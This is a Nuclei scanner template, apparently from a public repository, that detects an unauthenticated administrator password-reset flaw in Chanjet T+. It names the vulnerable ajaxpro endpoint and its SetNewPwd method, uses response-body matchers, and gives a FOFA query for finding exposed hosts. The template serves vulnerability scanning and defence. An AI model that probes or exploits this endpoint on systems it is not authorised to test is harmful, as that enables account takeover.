nuclei-templates/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passre...

30 lines
1.2 KiB
YAML
Raw Normal View History

id: chanjet-tplus-unauth-passreset
info:
name: Chanjet Tplus - Unauthorized Password Reset
author: 0xr2r
severity: high
2024-03-06 09:12:01 +00:00
description: |
There is an unauthorized administrator password modification vulnerability in UF Chanjet T+ RecoverPassword.aspx. An attacker can use this vulnerability to modify the administrator account password to log in to the backend.
reference:
- https://cn-sec.com/archives/1377207.html
- https://www.chanjet.com
metadata:
2024-03-11 07:05:49 +00:00
max-request: 2
verified: true
2024-03-11 07:05:49 +00:00
fofa-query: app="畅捷通-TPlus"
tags: tplus,unauth,chanjet
http:
- method: GET
path:
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}"
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
matchers:
- type: dsl
dsl:
- "contains(body_1, 'tplus”应用程序中的服务器错误')"
- "!contains(body_2, '>请重新登录')"
condition: and
# digest: 4a0a004730450220196561bdf0315ff002edd2dc6b8f06301ec41ce768ac8d6c35924d431022b2cf022100f055d89d18959e389d8e5737f54ba35089dc0756d78b21a2a0358d536f1ab8ed:922c64590222798bb761d5b6d8e72950